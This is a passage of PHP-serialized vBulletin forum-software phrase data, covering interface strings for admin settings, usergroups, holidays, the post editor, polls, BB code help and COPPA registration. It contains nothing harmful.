Administrators\";s:24:\"empty_postindex_and_word\";s:114:\"Empty postindex and word tables?This can also be done from the Maintenance section later. \";s:13:\"enable_albums\";s:6:\"Albums\";s:24:\"enable_all_ajax_features\";s:24:\"Enable All AJAX Features\";s:14:\"enable_friends\";s:7:\"Friends\";s:13:\"enable_groups\";s:13:\"Social Groups\";s:22:\"enable_profile_styling\";s:15:\"Profile Styling\";s:36:\"enable_standard_and_wysiwyg_controls\";s:39:\"Enable Standard & WYSIWYG Controls \";s:24:\"enable_standard_controls\";s:24:\"Enable Standard Controls\";s:23:\"enable_visitor_tracking\";s:16:\"Visitor Tracking\";s:25:\"error_confirmation_phrase\";s:101:\"There are errors in the settings on this page.\\n\\r\\n\\n\\r\\nAre you sure you want to save the settings?\";s:21:\"expand_setting_groups\";s:21:\"Expand Setting Groups\";s:8:\"expanded\";s:8:\"Expanded\";s:11:\"full_editor\";s:11:\"Full Editor\";s:14:\"gd_simple_font\";s:16:\"GD (Simple Font)\";s:11:\"gd_ttf_font\";s:19:\"GD (True Type Font)\";s:13:\"group_by_date\";s:13:\"Group by Date\";s:14:\"group_by_event\";s:14:\"Group by Event\";s:27:\"ignore_blacklisted_settings\";s:27:\"Ignore Blacklisted settings\";s:17:\"imagemagick_error\";s:17:\"ImageMagick Error\";s:24:\"import_settings_xml_file\";s:24:\"Import Settings XML File\";s:18:\"importing_settings\";s:18:\"Importing Settings\";s:23:\"inactivity_cookie_based\";s:23:\"Inactivity/Cookie Based\";s:21:\"instant_message_icons\";s:21:\"Instant Message Icons\";s:35:\"language_specific_skypeweb_graphics\";s:39:\"Use Language-Specific SkypeWeb Graphics\";s:5:\"links\";s:5:\"Links\";s:21:\"live_permission_check\";s:21:\"Live Permission Check\";s:6:\"lostpw\";s:21:\"Recover Lost Password\";s:8:\"no_email\";s:8:\"No Email\";s:19:\"no_permission_check\";s:19:\"No Permission Check\";s:6:\"normal\";s:6:\"Normal\";s:37:\"not_specified_questions_no_validation\";s:90:\"You have not specified any questions. No validation will happen until a question is added.\";s:17:\"only_one_per_post\";s:36:\"Yes, if post has only one attachment\";s:11:\"option_code\";s:68:\"Option Code (blank, yesno, textarea, or custom eval code) \";s:21:\"qr_click_not_required\";s:18:\"Click Not Required\";s:17:\"qr_click_required\";s:14:\"Click Required\";s:21:\"question_verification\";s:34:\"Question & Answer Verification\";s:10:\"quick_edit\";s:10:\"Quick Edit\";s:11:\"quick_reply\";s:11:\"Quick Reply\";s:12:\"random_color\";s:12:\"Random Color\";s:11:\"random_font\";s:11:\"Random Font\";s:15:\"random_fontsize\";s:16:\"Random Font Size\";s:12:\"random_shape\";s:13:\"Random Shapes\";s:12:\"random_slant\";s:12:\"Random Slant\";s:9:\"recaptcha\";s:16:\"reCAPTCHA™\";s:20:\"recaptcha_blackglass\";s:11:\"Black Glass\";s:15:\"recaptcha_clean\";s:5:\"Clean\";s:13:\"recaptcha_red\";s:3:\"Red\";s:30:\"recaptcha_verification_options\";s:37:\"reCAPTCHA™ Verification Options\";s:15:\"recaptcha_white\";s:5:\"White\";s:8:\"register\";s:8:\"Register\";s:23:\"remove_fulltext_indices\";s:23:\"Remove Fulltext Indexes\";s:16:\"require_birthday\";s:16:\"Require Birthday\";s:7:\"restore\";s:7:\"Restore\";s:25:\"restore_settings_xml_file\";s:25:\"Restore Settings XML File\";s:16:\"restore_xml_file\";s:40:\"OR restore the XML file from your server\";s:13:\"save_settings\";s:13:\"Save Settings\";s:7:\"setting\";s:7:\"Setting\";s:23:\"settings_bitfield_error\";s:99:\"An error occurred while processing the bitfield files, the following information was returned: %1$s\";s:17:\"show_all_settings\";s:17:\"Show All Settings\";s:32:\"show_birthdays_active_users_only\";s:36:\"Show birthdays for active users only\";s:32:\"show_total_number_active_members\";s:35:\"Show total number of active members\";s:6:\"single\";s:6:\"Single\";s:25:\"specify_magick_path_above\";s:46:\"Please specify a valid ImageMagick path above.\";s:18:\"suggested_settings\";s:18:\"Suggested Settings\";s:18:\"use_custom_setting\";s:34:\"Use Custom Setting (Specify Below)\";s:19:\"validation_php_code\";s:19:\"Validation PHP Code\";s:20:\"yes_alphabetical_all\";s:41:\"Yes, Alphabetical listing to all visitors\";s:24:\"yes_alphabetical_members\";s:41:\"Yes, Alphabetical listing to members only\";s:26:\"yes_but_disable_moderators\";s:27:\"Yes, but Disable Moderators\";s:20:\"yes_but_verify_image\";s:21:\"Yes, but Verify Image\";s:9:\"yes_click\";s:10:\"Yes, Click\";s:18:\"yes_click_or_hover\";s:19:\"Yes, Click or Hover\";s:23:\"yes_display_post_counts\";s:25:\"Yes - Display Post Counts\";s:20:\"yes_hide_post_counts\";s:22:\"Yes - Hide Post Counts\";s:9:\"yes_hover\";s:10:\"Yes, Hover\";s:22:\"yes_plain_text_version\";s:23:\"Yes, plain text version\";s:14:\"yes_random_all\";s:35:\"Yes, Random listing to all visitors\";s:18:\"yes_random_members\";s:35:\"Yes, Random listing to members only\";s:21:\"yes_rich_text_version\";s:22:\"Yes, rich text version\";s:15:\"yes_with_border\";s:16:\"Yes, with border\";s:30:\"yes_with_border_and_dimensions\";s:31:\"Yes, with border and dimensions\";s:19:\"yes_with_dimensions\";s:20:\"Yes, with dimensions\";s:16:\"yes_with_locking\";s:17:\"Yes, with locking\";s:15:\"yesterday_today\";s:17:\"Yesterday / Today\";s:44:\"your_forum_is_currently_using_default_search\";s:506:\"Your forum is currently using the vBulletin search engine.\r\n \r\nTo enable the MySQL Fulltext search, we will issue the following two queries. If for some reason this process is unsuccessful, you will need to perform these queries manually. Please be patient as this can take from 10 seconds to an hour depending on the number of posts on your forum.\r\n \r\nALTER TABLE %1$spost ADD FULLTEXT INDEX (title,pagetext) \r\nALTER TABLE %1$sthread ADD FULLTEXT INDEX (title) \r\n%2$s\r\n%3$s\";s:45:\"your_forum_is_currently_using_fulltext_search\";s:330:\"Your forum is currently using the Fulltext search engine.\r\n \r\nIf you wish to revert to the vBulletin search engine, please continue. You can leave the Fulltext indexes in place if you expect to return to the Fulltext search in the near future. Leaving them in place will cause added load on your system in the interim.\";s:44:\"your_post_and_thread_table_will_be_converted\";s:127:\"Your post and thread table will be converted to the MyISAM type in order to support Fulltext searching. \";}', 'a:12:{s:6:\"always\";s:6:\"Always\";s:46:\"are_you_sure_you_want_to_delete_this_user_rank\";s:47:\"Are you sure you want to delete this User Rank?\";s:12:\"display_type\";s:12:\"Display Type\";s:12:\"displaygroup\";s:12:\"Displaygroup\";s:33:\"if_displaygroup_equals_this_group\";s:28:\"If Displaygroup = This Group\";s:6:\"images\";s:6:\"Images\";s:21:\"or_you_may_enter_text\";s:54:\"OR you may enter textHTML is allowed \";s:9:\"rank_type\";s:9:\"Rank Type\";s:10:\"stack_rank\";s:10:\"Stack Rank\";s:20:\"times_to_repeat_rank\";s:31:\"Number of times to repeat rank:\";s:19:\"user_rank_file_path\";s:19:\"User Rank File Path\";s:17:\"user_rank_manager\";s:17:\"User Rank Manager\";}', 'a:22:{s:17:\"add_new_usergroup\";s:17:\"Add New Usergroup\";s:24:\"add_new_usergroup_leader\";s:24:\"Add New Usergroup Leader\";s:20:\"add_usergroup_leader\";s:20:\"Add Usergroup Leader\";s:49:\"are_you_sure_want_to_delete_promotion_usergroup_x\";s:182:\"Are you sure you want to delete the promotion from the usergroup called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:46:\"are_you_sure_want_to_delete_usergroup_leader_x\";s:170:\"Are you sure you want to delete the usergroup leader called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:39:\"are_you_sure_want_to_delete_usergroup_x\";s:163:\"Are you sure you want to delete the usergroup called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:37:\"create_permissions_based_off_of_forum\";s:48:\"Create Forum Permissions Based off of Usergroup:\";s:39:\"create_usergroup_based_off_of_usergroup\";s:40:\"Create Usergroup Based off of Usergroup:\";s:17:\"custom_usergroups\";s:17:\"Custom Usergroups\";s:15:\"days_registered\";s:15:\"Days Registered\";s:18:\"default_usergroups\";s:18:\"Default Usergroups\";s:16:\"delete_usergroup\";s:16:\"Delete Usergroup\";s:14:\"edit_usergroup\";s:14:\"Edit Usergroup\";s:24:\"processing_join_requests\";s:24:\"Processing Join Requests\";s:9:\"promotion\";s:9:\"Promotion\";s:21:\"public_group_settings\";s:21:\"Public Group Settings\";s:32:\"public_joinable_custom_usergroup\";s:35:\"Public (Joinable) Custom Usergroups\";s:25:\"show_all_additional_users\";s:25:\"Show All Additional Users\";s:22:\"show_all_primary_users\";s:22:\"Show All Primary Users\";s:17:\"usergroup_manager\";s:17:\"Usergroup Manager\";s:18:\"view_join_requests\";s:18:\"View Join Requests\";s:15:\"view_reputation\";s:15:\"View Reputation\";}', 'a:16:{s:13:\"ash_wednesday\";s:13:\"Ash Wednesday\";s:18:\"ash_wednesday_desc\";s:21:\"Ash Wednesday Holiday\";s:14:\"corpus_christi\";s:14:\"Corpus Christi\";s:19:\"corpus_christi_desc\";s:22:\"Corpus Christi Holiday\";s:6:\"easter\";s:6:\"Easter\";s:11:\"easter_desc\";s:14:\"Easter Holiday\";s:12:\"event_x_to_y\";s:12:\"%1$s to %2$s\";s:11:\"good_friday\";s:11:\"Good Friday\";s:16:\"good_friday_desc\";s:19:\"Good Friday Holiday\";s:8:\"holidays\";s:8:\"Holidays\";s:10:\"mardi_gras\";s:10:\"Mardi Gras\";s:15:\"mardi_gras_desc\";s:18:\"Mardi Gras Holiday\";s:11:\"palm_sunday\";s:11:\"Palm Sunday\";s:16:\"palm_sunday_desc\";s:19:\"Palm Sunday Holiday\";s:9:\"pentecost\";s:9:\"Pentecost\";s:14:\"pentecost_desc\";s:17:\"Pentecost Holiday\";}', 'a:150:{s:23:\"add_edit_files_attached\";s:56:\"Click here to add or edit files attached to this message\";s:8:\"add_tags\";s:8:\"Add Tags\";s:10:\"added_by_x\";s:13:\"Added by %1$s\";s:18:\"additional_options\";s:18:\"Additional Options\";s:12:\"align_center\";s:12:\"Align Center\";s:10:\"align_left\";s:10:\"Align Left\";s:11:\"align_right\";s:11:\"Align Right\";s:12:\"attach_files\";s:12:\"Attach Files\";s:14:\"attachment_key\";s:14:\"Attachment Key\";s:6:\"author\";s:6:\"Author\";s:33:\"automatically_parse_links_in_text\";s:33:\"Automatically parse links in text\";s:7:\"average\";s:7:\"Average\";s:3:\"bad\";s:3:\"Bad\";s:4:\"bold\";s:4:\"Bold\";s:6:\"browse\";s:6:\"Browse\";s:28:\"browser_is_safari_no_wysiwyg\";s:49:\"The Safari browser does not support WYSIWYG mode.\";s:26:\"can_add_a_score_for_thread\";s:49:\"If you like, you can add a score for this thread.\";s:28:\"cannot_add_tags_remove_first\";s:65:\"You cannot add any tags to this thread. Please remove some first.\";s:14:\"check_spelling\";s:14:\"Check Spelling\";s:15:\"choose_a_rating\";s:15:\"Choose a rating\";s:11:\"choose_file\";s:11:\"Choose File\";s:17:\"close_this_thread\";s:47:\"Close this thread after you submit your message\";s:5:\"color\";s:5:\"Color\";s:6:\"colors\";s:6:\"Colors\";s:16:\"compare_versions\";s:16:\"Compare Versions\";s:27:\"complete_image_verification\";s:43:\"You did not complete the Image Verification\";s:4:\"copy\";s:4:\"Copy\";s:3:\"cut\";s:3:\"Cut\";s:15:\"decrease_indent\";s:15:\"Decrease Indent\";s:14:\"delete_message\";s:14:\"Delete Message\";s:39:\"delete_message_check_appropriate_option\";s:107:\"To delete this message, check the appropriate option below and then click the \'Delete this Message\' button.\";s:19:\"delete_this_message\";s:19:\"Delete this Message\";s:35:\"deleting_message_deletion_of_thread\";s:122:\"Note: deleting this message will result in the deletion of the entire thread because this is the first post in the thread.\";s:16:\"deletion_options\";s:16:\"Deletion Options\";s:23:\"disable_smilies_in_text\";s:23:\"Disable smilies in text\";s:21:\"do_not_delete_message\";s:21:\"Do Not Delete Message\";s:16:\"do_not_subscribe\";s:16:\"Do not subscribe\";s:17:\"edit_announcement\";s:17:\"Edit Announcement\";s:9:\"edit_tags\";s:9:\"Edit Tags\";s:16:\"enter_email_link\";s:44:\"Please enter the email address for the link:\";s:15:\"enter_image_url\";s:35:\"Please enter the URL of your image:\";s:15:\"enter_link_text\";s:55:\"Enter the text to be displayed for the link (optional):\";s:14:\"enter_link_url\";s:34:\"Please enter the URL of your link:\";s:15:\"enter_list_item\";s:81:\"Enter a list item.\\r\\nLeave the box empty or press \'Cancel\' to complete the list:\";s:15:\"enter_list_type\";s:143:\"What type of list do you want? Enter \'1\' for a numbered list, enter \'a\' for an alphabetical list, or leave blank for a list with bullet points:\";s:18:\"enter_option_x_tag\";s:36:\"Enter the option for the [%1$s] tag:\";s:16:\"enter_tag_option\";s:42:\"Please enter the option for your %1$s tag:\";s:26:\"enter_text_to_be_formatted\";s:30:\"Enter the text to be formatted\";s:9:\"excellent\";s:9:\"Excellent\";s:8:\"explicit\";s:8:\"Explicit\";s:14:\"filesize_bytes\";s:16:\"Filesize (bytes)\";s:8:\"filetype\";s:8:\"Filetype\";s:5:\"fonts\";s:5:\"Fonts\";s:11:\"go_advanced\";s:11:\"Go Advanced\";s:4:\"good\";s:4:\"Good\";s:29:\"have_uploaded_maximum_x_files\";s:43:\"You have uploaded the maximum of %1$s files\";s:21:\"iespell_not_installed\";s:196:\"ieSpell is a spell-checking tool for Internet Explorer.\\r\\n\\r\\nIf you would like to download ieSpell, click OK; otherwise click Cancel.\\r\\n\\r\\nieSpell can be downloaded from http://www.iespell.com\";s:15:\"increase_indent\";s:15:\"Increase Indent\";s:6:\"indent\";s:6:\"Indent\";s:10:\"insert_all\";s:10:\"Insert All\";s:17:\"insert_email_link\";s:17:\"Insert Email Link\";s:12:\"insert_image\";s:12:\"Insert Image\";s:11:\"insert_link\";s:11:\"Insert Link\";s:6:\"italic\";s:6:\"Italic\";s:16:\"keep_attachments\";s:16:\"Keep Attachments\";s:8:\"keywords\";s:8:\"Keywords\";s:12:\"max_filesize\";s:12:\"Max Filesize\";s:10:\"max_height\";s:10:\"Max Height\";s:9:\"max_width\";s:9:\"Max Width\";s:7:\"maximum\";s:7:\"Maximum\";s:22:\"message_by_x_on_y_at_z\";s:110:\"Message originally posted by %2$s on %3$s at %4$s \";s:17:\"message_too_short\";s:100:\"The message you have entered is too short. Please lengthen your message to at least %1$s characters.\";s:4:\"more\";s:4:\"More\";s:20:\"moz_edit_config_file\";s:63:\"You need to edit your Mozilla config file to allow this action.\";s:20:\"moz_must_select_text\";s:73:\"Mozilla requires that you must select some text for this function to work\";s:18:\"must_enter_subject\";s:33:\"You must enter a title / subject!\";s:23:\"must_select_text_to_use\";s:47:\"You must select some text to use this function.\";s:34:\"must_select_two_version_comparison\";s:66:\"You must select two different versions to make a valid comparison.\";s:22:\"number_of_poll_options\";s:22:\"Number of poll options\";s:12:\"ordered_list\";s:12:\"Ordered List\";s:13:\"original_post\";s:13:\"Original Post\";s:5:\"paste\";s:5:\"Paste\";s:25:\"physically_remove_message\";s:25:\"Physically Remove Message\";s:15:\"podcast_options\";s:15:\"Podcast Options\";s:11:\"podcast_url\";s:11:\"Podcast URL\";s:11:\"post_a_poll\";s:11:\"Post a Poll\";s:15:\"post_comparison\";s:15:\"Post Comparison\";s:17:\"post_edit_history\";s:17:\"Post Edit History\";s:21:\"post_new_announcement\";s:21:\"Post New Announcement\";s:15:\"post_new_thread\";s:15:\"Post New Thread\";s:27:\"posting_message_please_wait\";s:29:\"Posting Message - Please Wait\";s:7:\"preview\";s:7:\"Preview\";s:15:\"preview_changes\";s:15:\"Preview Changes\";s:15:\"preview_message\";s:15:\"Preview Message\";s:12:\"preview_post\";s:12:\"Preview Post\";s:11:\"quick_reply\";s:11:\"Quick Reply\";s:19:\"reason_for_deletion\";s:19:\"Reason for Deletion\";s:18:\"reason_for_editing\";s:18:\"Reason for Editing\";s:4:\"redo\";s:4:\"Redo\";s:11:\"remove_link\";s:11:\"Remove Link\";s:22:\"remove_text_formatting\";s:22:\"Remove Text Formatting\";s:18:\"reopen_this_thread\";s:49:\"Re-open this thread after you submit your message\";s:15:\"reply_to_thread\";s:15:\"Reply to Thread\";s:14:\"reply_to_topic\";s:14:\"Reply to Topic\";s:19:\"reset_views_counter\";s:27:\"Reset Views Counter to Zero\";s:23:\"select_a_file_to_attach\";s:31:\"Please select a file to attach.\";s:31:\"selected_1_post_not_part_thread\";s:229:\"You have selected 1 post that is not part of this thread. Quote this post as well , or deselect this post .\";s:32:\"selected_x_posts_not_part_thread\";s:238:\"You have selected %1$s posts that are not part of this thread. Quote these posts as well , or deselect these posts .\";s:25:\"separate_tags_using_comma\";s:28:\"Separate tags using a comma.\";s:16:\"show_all_smilies\";s:16:\"Show all Smilies\";s:19:\"show_your_signature\";s:19:\"Show your signature\";s:5:\"sizes\";s:5:\"Sizes\";s:17:\"stick_this_thread\";s:47:\"Stick this thread after you submit your message\";s:5:\"stuck\";s:5:\"Stuck\";s:14:\"submit_message\";s:14:\"Submit Message\";s:17:\"submit_new_thread\";s:17:\"Submit New Thread\";s:12:\"submit_reply\";s:12:\"Submit Reply\";s:8:\"subtitle\";s:8:\"Subtitle\";s:18:\"switch_editor_mode\";s:18:\"Switch Editor Mode\";s:14:\"tag_management\";s:14:\"Tag Management\";s:22:\"tags_visible_all_users\";s:34:\"Tags will be visible to all users.\";s:8:\"terrible\";s:8:\"Terrible\";s:12:\"text_changes\";s:12:\"Text Changes\";s:43:\"this_forum_is_not_accepting_new_attachments\";s:43:\"This forum is not accepting new attachments\";s:29:\"this_user_on_your_ignore_list\";s:40:\"This user is on your Ignore List .\";s:29:\"thread_has_more_than_x_review\";s:114:\"This thread has more than %1$s replies.\r\nClick here to review the whole thread.\";s:17:\"thread_management\";s:17:\"Thread Management\";s:19:\"thread_subscription\";s:19:\"Thread Subscription\";s:12:\"time_of_edit\";s:12:\"Time of Edit\";s:13:\"title_changes\";s:13:\"Title Changes\";s:25:\"topic_review_newest_first\";s:55:\"Topic Review (Newest First) \";s:27:\"uncheck_tag_remove_bold_you\";s:76:\"Uncheck a tag to remove it from this thread. Tags in bold were added by you.\";s:9:\"underline\";s:9:\"Underline\";s:4:\"undo\";s:4:\"Undo\";s:14:\"unordered_list\";s:14:\"Unordered List\";s:19:\"unstick_this_thread\";s:50:\"Un-stick this thread after you submit your message\";s:11:\"upload_file\";s:11:\"Upload File\";s:20:\"upload_file_from_url\";s:22:\"Upload File from a URL\";s:30:\"upload_file_from_your_computer\";s:30:\"Upload File from your Computer\";s:14:\"uploading_file\";s:31:\"Uploading File(s) - Please Wait\";s:14:\"wrap_code_tags\";s:37:\"Wrap [CODE] tags around selected text\";s:14:\"wrap_html_tags\";s:37:\"Wrap [HTML] tags around selected text\";s:13:\"wrap_php_tags\";s:36:\"Wrap [PHP] tags around selected text\";s:15:\"wrap_quote_tags\";s:38:\"Wrap [QUOTE] tags around selected text\";s:11:\"wrap_x_tags\";s:37:\"Wrap [%1$s] tags around selected text\";s:23:\"wysiwyg_command_invalid\";s:43:\"This command is invalid or not implemented.\";s:19:\"wysiwyg_initialized\";s:52:\"WYSIWYG Editor initialized for %1$s in %2$s seconds.\";s:19:\"wysiwyg_please_wait\";s:55:\"Please wait for the WYSIWYG editor to finish loading...\";s:22:\"yes_post_a_poll_thread\";s:33:\"Yes, post a poll with this thread\";s:28:\"you_may_add_x_tags_to_thread\";s:39:\"You may add %1$s tag(s) to this thread.\";}', 'a:17:{s:19:\"additional_option_1\";s:19:\"Additional Option 1\";s:19:\"additional_option_2\";s:19:\"Additional Option 2\";s:21:\"allow_multiple_choice\";s:76:\"Allow multiple choice: Give users the ability to select more than one answer\";s:35:\"automatically_close_poll_enter_days\";s:178:\"If you would like this poll to automatically close after a period of time, enter a number of days here. Set this to 0 if you would like the poll to remain open indefinitely.\";s:10:\"close_poll\";s:10:\"Close poll\";s:31:\"closing_poll_impossible_to_vote\";s:112:\"Note: Closing this poll makes it impossible to vote. It however does not stop people from replying to the thread\";s:12:\"days_after_x\";s:15:\"days after %1$s\";s:23:\"keep_poll_options_short\";s:56:\"Remember to keep the poll options short and to the point\";s:17:\"make_votes_public\";s:80:\"Make votes public: Displays all users who voted, and what choice they voted for.\";s:8:\"option_x\";s:11:\"Option %1$s\";s:12:\"poll_preview\";s:12:\"Poll Preview\";s:13:\"poll_question\";s:13:\"Poll Question\";s:12:\"poll_timeout\";s:12:\"Poll Timeout\";s:12:\"preview_poll\";s:12:\"Preview Poll\";s:15:\"submit_new_poll\";s:15:\"Submit New Poll\";s:33:\"to_close_this_poll_check_this_box\";s:35:\"To close this poll, check this box.\";s:14:\"update_options\";s:14:\"Update options\";}', 'a:92:{s:14:\"advanced_lists\";s:14:\"Advanced Lists\";s:17:\"attach_tag_allows\";s:174:\"The [attach] tag allows you to display an attachment in your post rather than at the bottom. It will only display attachments that belong to the post in which it is utilized.\";s:12:\"attachmentid\";s:12:\"attachmentid\";s:11:\"avatar_list\";s:11:\"Avatar List\";s:7:\"avatars\";s:7:\"Avatars\";s:20:\"avatars_small_images\";s:222:\"Avatars are small graphical images that you may choose in your profile.\r\n They are displayed by your username on all posts that you make.\r\n You can select the image that best describes yourself from your profile options.\";s:20:\"b_i_and_u_tags_allow\";s:87:\"The [b], [i] and [u] tags allow you to create text that is bold, italic and underlined.\";s:7:\"bb_code\";s:7:\"BB Code\";s:21:\"bb_code_based_on_html\";s:509:\"BB code is a set of tags based on the HTML language that you may already be familiar with.\r\n They allow you to add formatting to your messages in the same way as HTML does,\r\n but have a simpler syntax and will never break the layout of the pages you are viewing.\r\n The ability to use BB code is set on a forum-by-forum basis by the administrator,\r\n so you should check the forum rules when you post a new message. \r\n \r\n Below is a list of the BB code tags you can use to format your messages.\";s:11:\"bbcode_list\";s:12:\"BB Code List\";s:4:\"bold\";s:4:\"Bold\";s:14:\"bulleted_lists\";s:14:\"Bulleted Lists\";s:6:\"center\";s:6:\"Center\";s:22:\"click_here_to_email_me\";s:22:\"Click Here to Email Me\";s:8:\"click_me\";s:9:\"Click Me!\";s:17:\"code_tag_switches\";s:84:\"The [code] tag switches to a fixed-width (monospace) font and preserves all spacing.\";s:5:\"color\";s:5:\"Color\";s:16:\"color_tag_allows\";s:60:\"The [color] tag allows you to change the color of your text.\";s:13:\"email_linking\";s:13:\"Email Linking\";s:16:\"email_tag_allows\";s:114:\"The [email] tag allows you to link to an email address. You can include an optional parameter to \'name\' your link.\";s:14:\"example_output\";s:14:\"Example Output\";s:13:\"example_usage\";s:13:\"Example Usage\";s:8:\"faq_item\";s:8:\"FAQ Item\";s:4:\"font\";s:4:\"Font\";s:15:\"font_tag_allows\";s:58:\"The [font] tag allows you to change the font of your text.\";s:9:\"highlight\";s:9:\"Highlight\";s:20:\"highlight_tag_allows\";s:54:\"The [highlight] tag allows you to emphasize your text.\";s:15:\"html_tag_allows\";s:71:\"The [html] tag allows you to perform syntax highlighting for HTML code.\";s:6:\"images\";s:6:\"Images\";s:14:\"img_tag_allows\";s:137:\"The [img] tag allows you to embed images within your posts. You can also combine this tag with the [url] tag to make images become links.\";s:23:\"incorrect_bb_code_usage\";s:440:\"Incorrect BB Code Usage: \r\n \r\n [url] www.example.com [/url] - don\'t put spaces between the bracketed code and the text you are applying the code to. \r\n [email] myname@domain.com[email] - the end brackets must include a forward slash ([/email] ) \r\n \";s:6:\"indent\";s:6:\"Indent\";s:17:\"indent_tag_allows\";s:48:\"The [indent] tag allows you to indent your text.\";s:6:\"italic\";s:6:\"Italic\";s:4:\"left\";s:4:\"Left\";s:32:\"left_right_and_center_tags_allow\";s:85:\"The [left], [right] and [center] tags allow you to change the alignment of your text.\";s:6:\"linked\";s:6:\"Linked\";s:11:\"list_item_1\";s:11:\"list item 1\";s:11:\"list_item_2\";s:11:\"list item 2\";s:15:\"list_tag_allows\";s:153:\"The [list] tag allows you to create simple, bulleted lists without specifying an option. Within the value portion, each bullet is denoted by the [*] tag.\";s:24:\"list_tag_allows_advanced\";s:344:\"The [list] tag allows you to create advanced lists by specifying an option. The option should have a value of 1 (for a numbered list) or A (for an alphabetic with capital letters list) or a (for an alphabetic with lowercase letters list) or I (for a numbered with capital Roman numeral list) or i (for a numbered with small Roman numeral list).\";s:15:\"match_all_words\";s:15:\"Match All Words\";s:15:\"match_any_words\";s:15:\"Match Any Words\";s:21:\"match_complete_phrase\";s:21:\"Match Complete Phrase\";s:16:\"matching_options\";s:16:\"Matching Options\";s:7:\"meaning\";s:7:\"Meaning\";s:31:\"no_predefined_avatars_available\";s:43:\"There are no pre-defined avatars available.\";s:18:\"noparse_tag_allows\";s:60:\"The [noparse] tag allows you to stop the parsing of BB code.\";s:10:\"not_linked\";s:10:\"Not linked\";s:30:\"note_the_id_is_just_an_example\";s:87:\"(Note: The threadid/postid is just an example and may not link to a valid thread/post.)\";s:16:\"php_tag_performs\";s:196:\"The [php] tag performs the same function as the [code] tag, but also adds syntax highlighting for PHP code. Although it is designed for PHP, it may correctly highlight some other C-like languages.\";s:12:\"post_linking\";s:12:\"Post Linking\";s:15:\"post_tag_allows\";s:128:\"The [post] tag allows you to link to posts by specifying the post id. You can include an optional parameter to \'name\' your link.\";s:6:\"postid\";s:6:\"postid\";s:16:\"quote_tag_allows\";s:61:\"The [quote] tag allows you to attribute text to someone else.\";s:17:\"resulting_graphic\";s:17:\"Resulting Graphic\";s:5:\"right\";s:5:\"Right\";s:10:\"search_faq\";s:10:\"Search FAQ\";s:9:\"search_in\";s:9:\"Search in\";s:22:\"search_titles_and_text\";s:24:\"Search Titles & Text\";s:12:\"search_words\";s:14:\"Search Word(s)\";s:27:\"showing_avatars_x_to_y_of_z\";s:36:\"Showing Avatars %1$s to %2$s of %3$s\";s:17:\"signature_picture\";s:17:\"Signature Picture\";s:29:\"signature_picture_description\";s:40:\"Signature Picture Description (optional)\";s:17:\"sigpic_tag_allows\";s:186:\"The [sigpic] tag allows you to insert your uploaded signature picture into your signature. This tag does not work in posts and will not work if you have not uploaded a signature picture.\";s:4:\"size\";s:4:\"Size\";s:15:\"size_tag_allows\";s:58:\"The [size] tag allows you to change the size of your text.\";s:24:\"smilies_are_small_images\";s:655:\"\'Smilies\' are small graphical images that can be used to convey an emotion or feeling.\r\n If you have used email or internet chat, you are likely familiar with the smilie concept.\r\n Certain standard strings are automatically converted into smilies.\r\n Try twisting your head on one side if you do not \'get\' smilies;\r\n using a bit of imagination should reveal a face of some description. \r\n \r\n If you want to disable smilies in a post that you make, you can select the \'Disable Smilies\' option\r\n when posting. This is particularly useful if you are posting program code and you do not\r\n want ;) converted to a smilie face!\";s:19:\"stop_bbcode_parsing\";s:20:\"Stop BB Code Parsing\";s:33:\"text_two_sizes_larger_than_normal\";s:41:\"this text is two sizes larger than normal\";s:17:\"this_text_is_blue\";s:17:\"this text is blue\";s:17:\"this_text_is_bold\";s:17:\"this text is bold\";s:27:\"this_text_is_center_aligned\";s:27:\"this text is center-aligned\";s:25:\"this_text_is_courier_font\";s:32:\"this text is in the courier font\";s:24:\"this_text_is_highlighted\";s:24:\"this text is highlighted\";s:21:\"this_text_is_indented\";s:21:\"this text is indented\";s:19:\"this_text_is_italic\";s:19:\"this text is italic\";s:25:\"this_text_is_left_aligned\";s:25:\"this text is left-aligned\";s:26:\"this_text_is_right_aligned\";s:26:\"this text is right-aligned\";s:23:\"this_text_is_underlined\";s:23:\"this text is underlined\";s:14:\"thread_linking\";s:14:\"Thread Linking\";s:17:\"thread_tag_allows\";s:134:\"The [thread] tag allows you to link to threads by specifying the thread id. You can include an optional parameter to \'name\' your link.\";s:8:\"threadid\";s:8:\"threadid\";s:9:\"underline\";s:9:\"Underline\";s:16:\"url_hyperlinking\";s:16:\"URL Hyperlinking\";s:14:\"url_tag_allows\";s:120:\"The [url] tag allows you to link to other websites and files. You can include an optional parameter to \'name\' your link.\";s:5:\"usage\";s:5:\"Usage\";s:5:\"value\";s:5:\"value\";s:28:\"vbulletin_forums_post_269302\";s:18:\"%1$s - Post 269302\";s:29:\"vbulletin_forums_thread_42918\";s:19:\"%1$s - Thread 42918\";s:12:\"what_to_type\";s:12:\"What to Type\";s:28:\"x_requiring_at_least_y_posts\";s:34:\"%1$s Requiring at Least %2$s Posts\";}', 'a:45:{s:38:\"additional_required_information_option\";s:40:\"Additional Required Information (option)\";s:39:\"additional_required_information_profile\";s:41:\"Additional Required Information (profile)\";s:21:\"complete_registration\";s:21:\"Complete Registration\";s:21:\"confirm_email_address\";s:21:\"Confirm Email Address\";s:16:\"confirm_password\";s:16:\"Confirm Password\";s:27:\"contact_webmaster_questions\";s:66:\"Please contact the webmaster with any questions\";s:5:\"coppa\";s:5:\"COPPA\";s:12:\"coppa_policy\";s:12:\"COPPA Policy\";s:11:\"coppa_rules\";s:11:\"COPPA Rules\";s:23:\"coppa_rules_description\";s:810:\" All users under the age of 13 must seek permission from their parent or guardian\r\nin order to gain membership of the %1$s forums.\r\nWhile we welcome participation from members under 13,\r\nwe require that a parent or guardian fax or mail back a signed permission form before we grant membership.
\r\n\r\nIf you would like to start the registration process prior to us receiving a permission form,\r\ncheck the \'I agree\' checkbox and press the \'Register\' button below. If you would like to cancel the registration,\r\nclick here to return to the forums index.
\r\n\r\nA copy of the permission form can be downloaded here .
\r\n\r\nFor more information about the registration process, or the %1$s forums in general,\r\nplease send email to %4$s .
